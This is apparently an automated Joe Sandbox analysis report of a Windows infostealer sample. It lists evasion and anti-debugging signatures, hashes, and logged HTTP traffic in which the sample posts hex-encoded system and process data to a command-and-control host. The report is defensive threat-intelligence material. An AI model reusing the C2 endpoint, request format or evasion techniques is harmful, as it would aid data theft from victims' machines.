Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
EwhnoHx0n5.exe

Overview

General Information

Sample name:EwhnoHx0n5.exe
renamed because original name is a hash value
Original sample name:4c88ff06e9f5d8aaf6b642eb809dd2ff.exe
Analysis ID:1581252
MD5:4c88ff06e9f5d8aaf6b642eb809dd2ff
SHA1:08af05a701deb7cb5863567cf8a63bfce814c07d
SHA256:8fa7158a6212803480850dec0236641a4a249216778d0cef9a1d82738566af98
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • EwhnoHx0n5.exe (PID: 1688 cmdline: "C:\Users\user\Desktop\EwhnoHx0n5.exe" MD5: 4C88FF06E9F5D8AAF6B642EB809DD2FF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: EwhnoHx0n5.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: EwhnoHx0n5.exeVirustotal: Detection: 58%Perma Link
Source: EwhnoHx0n5.exeReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: EwhnoHx0n5.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0047DCF0
Source: EwhnoHx0n5.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_004BA5B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_004BB560
Source: EwhnoHx0n5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0045255D
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004529FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560227Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 34 33 35 39 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 5.101.3.217 5.101.3.217
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0051A8C0 recvfrom,0_2_0051A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560227Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 38 35 39 30 39 31 33 37 32 30 36 34 33 35 39 31 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:07:50 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 08:07:52 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1501495234.000000000183D000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1513066936.0000000001871000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501735272.0000000001862000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1501782053.000000000186F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: EwhnoHx0n5.exe, 00000000.00000003.1502602520.0000000001808000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512556245.000000000180A000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000003.1502584859.0000000001803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: EwhnoHx0n5.exe, 00000000.00000003.1501495234.0000000001812000.00000004.00000020.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1512843230.0000000001815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: EwhnoHx0n5.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: EwhnoHx0n5.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: EwhnoHx0n5.exe, EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: EwhnoHx0n5.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: EwhnoHx0n5.exe, 00000000.00000003.1364654602.0000000007420000.00000004.00001000.00020000.00000000.sdmp, EwhnoHx0n5.exe, 00000000.00000002.1510829214.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

System Summary

barindex
PE file contains section with special chars
Source: EwhnoHx0n5.exeStatic PE information: section name:
Source: EwhnoHx0n5.exeStatic PE information: section name: .idata
Source: EwhnoHx0n5.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004605B00_2_004605B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00466FA00_2_00466FA0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0048F1000_2_0048F100
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0051B1800_2_0051B180
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007DE0500_2_007DE050
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007DA0000_2_007DA000
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_005200E00_2_005200E0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004B62100_2_004B6210
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0051C3200_2_0051C320
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007A44100_2_007A4410
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_005204200_2_00520420
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045E6200_2_0045E620
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0051C7700_2_0051C770
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007B67300_2_007B6730
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004BA7F00_2_004BA7F0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007D47800_2_007D4780
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004649400_2_00464940
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045A9600_2_0045A960
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0050C9000_2_0050C900
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00626AC00_2_00626AC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0070AAC00_2_0070AAC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_005E4B600_2_005E4B60
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0070AB2C0_2_0070AB2C
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007C8BF00_2_007C8BF0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0045CBB00_2_0045CBB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007DCC900_2_007DCC90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007D4D400_2_007D4D40
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00610D800_2_00610D80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007CCD800_2_007CCD80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0076AE300_2_0076AE30
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00474F700_2_00474F70
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_0051EF900_2_0051EF90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00518F900_2_00518F90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007A2F900_2_007A2F90
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_004610E60_2_004610E6
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007BD4300_2_007BD430
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007C35B00_2_007C35B0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007E17A00_2_007E17A0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_005098800_2_00509880
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007A99200_2_007A9920
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007D3A700_2_007D3A70
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00491BE00_2_00491BE0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007C1BD00_2_007C1BD0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_007B7CC00_2_007B7CC0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00709C800_2_00709C80
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00465DB00_2_00465DB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00463ED00_2_00463ED0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: 0_2_00475EB00_2_00475EB0
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 0046CD40 appears 80 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 004575A0 appears 704 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 00607220 appears 103 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 0046CCD0 appears 54 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 005344A0 appears 76 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 004573F0 appears 113 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 004950A0 appears 101 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 0045C960 appears 37 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 0062CBC0 appears 104 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 004571E0 appears 47 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 00495340 appears 50 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 0045CAA0 appears 61 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 00494F40 appears 345 times
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeCode function: String function: 00494FD0 appears 289 times
Source: EwhnoHx0n5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
